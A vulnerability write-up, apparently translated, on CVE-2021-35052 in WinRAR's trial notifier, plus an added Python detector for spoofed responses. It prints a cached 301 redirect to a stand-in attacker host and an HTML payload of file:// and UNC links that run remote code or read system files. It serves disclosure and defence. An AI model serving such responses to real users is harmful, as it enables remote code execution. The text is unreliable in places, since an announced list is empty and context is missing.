This article describes a vulnerability in the trial version of WinRAR that has serious consequences for the management of third-party software. It allows an attacker to intercept and modify the requests that the application sends on behalf of its users, and it can be used for remote code execution (RCE) on the victim's computer. The vulnerability is tracked as CVE-2021-35052.
What is WinRAR?
WinRAR is an application for managing files on the Windows operating system. It can create and extract popular archive formats such as RAR and ZIP. It is distributed as trial software, letting users try the full feature set for a certain number of days; after that, users can keep using the application free of charge, but with some features disabled.
Somewhat surprisingly, this error appears only in the Internet Explorer browser.
After a few tests it became apparent that, once the trial period has expired, roughly one in three launches of WinRAR.exe shows this message. The window is rendered by mshtml.dll through the Borland C++ component included with WinRAR.
The author set up Burp Suite as the default Windows proxy to analyse the data sent from the WinRAR error window and to see whether this behaviour could be exploited. When the request is sent over HTTPS, WinRAR users receive a warning about the insecure self-signed certificate that Burp uses. However, in my experience, many users click "Yes" and continue using the application.
Looking at this request, we can see the version (5.7.0) and that this is the 64-bit build of WinRAR:
GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com
Connection: close
Cookie: _wr=; _gid=; _ga=
Modifying the response to the user
Next, the author tried to modify the intercepted responses before they reached the user. If the response code is changed to "301 Moved Permanently", my redirect to the malicious domain "attacker.com" is cached, and all subsequent requests are redirected to "attacker.com":
HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close
Remote code execution
This man-in-the-middle attack requires ARP spoofing. The author tried several different attacks to see what this kind of access makes possible:
<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\windows\system.ini">file:///C:\windows\system.ini</a><br>
The code above is a spoofed response containing several possible attacks, such as running applications, retrieving host information, and opening the calculator application.
Most of these attacks succeed, but note that many of them still trigger additional Windows security warnings; for the attack to succeed, the user has to click "Run".
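A defender-side check for the two spoofed responses shown above (the cached 301 redirect and the HTML body full of file:// and UNC links), written as an added Python example that is not part of the original article and not WinRAR's own code: it parses a raw HTTP response to the notifier request and flags redirects that leave rarlab.com as well as anchors that resolve to local or LAN paths. The sample responses are constructed; attacker.com and 10.0.12.34 are the article's own placeholder values.

```python
import re
from urllib.parse import urlparse

# Hosts the WinRAR trial-expiry request is legitimately expected to talk to
TRUSTED_HOSTS = ("rarlab.com",)
# Anchors whose href points at a local file (file:) or a LAN share (\\host\share)
LOCAL_HREF = re.compile(r'href="((?:file:|\\\\)[^"]*)"', re.IGNORECASE)

def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def host_is_trusted(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)

def analyze_response(raw):
    """Return a list of findings for a response served to the notifier request."""
    status, headers, body = parse_response(raw)
    findings = []
    if status in (301, 302, 307, 308):
        location = headers.get("location", "")
        if not host_is_trusted(location):
            findings.append(f"redirect leaves trusted domain: {location}")
        if status in (301, 308):
            findings.append("permanent redirect: client may cache it for future launches")
    for href in LOCAL_HREF.findall(body):
        findings.append(f"local/UNC link in body: {href}")
    return findings

# Constructed samples modelled on the article's spoofed responses
SPOOFED_REDIRECT = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "content-length: 0\r\n"
    "Location: http://attacker.com/?language=English&landingpage=expired\r\n"
    "connection: close\r\n\r\n"
)
SPOOFED_PAGE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + r'''<a href="file://10.0.12.34/applications/test.jar">test.jar</a><br>
<a href="\\10.0.12.34\applications\test.jar">test.jar (UNC)</a><br>
<a href="file:///C:/windows/system32/calc.exe">calc.exe</a><br>
<a href="https://www.rarlab.com/download.htm">download</a>'''
```

Calling `analyze_response` on the samples returns two findings for the redirect (off-domain Location plus the cacheable status) and three for the page (the three local links; the rarlab.com download link is left alone).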
However, some file types run without any security warning, namely:
CVE-2018-20250 affects WinRAR 5.7 and below, so you should upgrade WinRAR now to avoid being attacked.
One of the biggest challenges a company faces is managing third-party software. Once installed, third-party software has access to read, write, and modify data on devices that access the corporate network.
It is not possible to test every application a user might install, so IT policy is essential for avoiding security risks.